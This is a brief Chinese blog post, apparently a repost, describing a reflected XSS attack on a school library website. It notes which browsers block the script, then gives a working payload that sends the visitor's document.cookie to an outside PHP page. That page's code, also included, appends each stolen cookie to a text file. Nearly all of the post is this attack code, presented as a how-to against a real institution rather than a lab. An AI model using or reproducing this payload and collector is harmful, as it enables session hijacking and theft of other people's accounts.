XSS之学校图书馆

时间：2017-03-26 18:39:02 阅读：271 评论：0 收藏：0 [点我收藏+]

1.不同的浏览器对js脚本的过滤措施不同，IE可以执行的，搜狗和Chrome提示Token contains reflects xss啥的

搜狗浏览器：

技术分享

IE:

技术分享

2.获取cookie

...............class=<script>window.open("http://www.cnblogs.com/1.php?cookie="+document.cookie)</script>解析：打开访问这个网址的窗口，并且通过msg传递一个变量这个变量就是cookie,IE把单引号标识为非法字符

在网站http://www.cnblogs.com/下的1.php接收cookie文件

<?php

　　$cookie=$_GET[‘cookie‘];

　　$file=fopen(‘1.txt‘,‘a‘);

　　fwrite($file,$cookie);

　　fclose($file);

XSS之学校图书馆

原文：http://www.cnblogs.com/xiaolangjun/p/6604602.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)